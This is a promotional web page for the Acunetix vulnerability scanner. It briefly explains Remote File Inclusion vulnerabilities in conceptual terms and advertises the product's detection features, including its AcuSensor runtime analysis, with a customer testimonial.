Remote File Inclusion (RFI) vulnerabilities are critical security issues within web applications since successful exploitation of such a vulnerability may lead to Remote Code Execution (RCE). An RFI vulnerability allows an attacker to remotely include a file hosted on a malicious web server. Once successfully carrying out their RFI attack, the attacker would typically try to obtain a reverse shell which provides them with a command line session where arbitrary commands can be executed.
RFI vulnerabilities are usually not difficult to fix, but finding them in large codebases could be challenging without the right tools. Acunetix is a web application vulnerability scanner which in addition to RFI, can test for LFI vulnerabilities and other file inclusion bugs, as well as Cross-site Scripting (XSS), SQL Injection (SQLi) and thousands of other vulnerabilities and misconfigurations.
Beyond low hanging fruit
Runtime source code analysis
In addition to being a fully automated black box scanner (no knowledge of backend code), Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is a an optional sensor for Java, ASP.NET and PHP applications that can easily be deployed on the application’s backend to analyse source code while it is in execution by the scanner, giving even more accurate results and even fewer false positives.
We utilize Acunetix to more thoroughly assess internet-facing websites and servers. Acunetix helps us identify vulnerabilities in conjunction with other vulnerability scanning applications. Acunetix has been a more reliable application when discovering / determining different types of malicious code injection vulnerabilities (SQL, HTML, CGI, etc).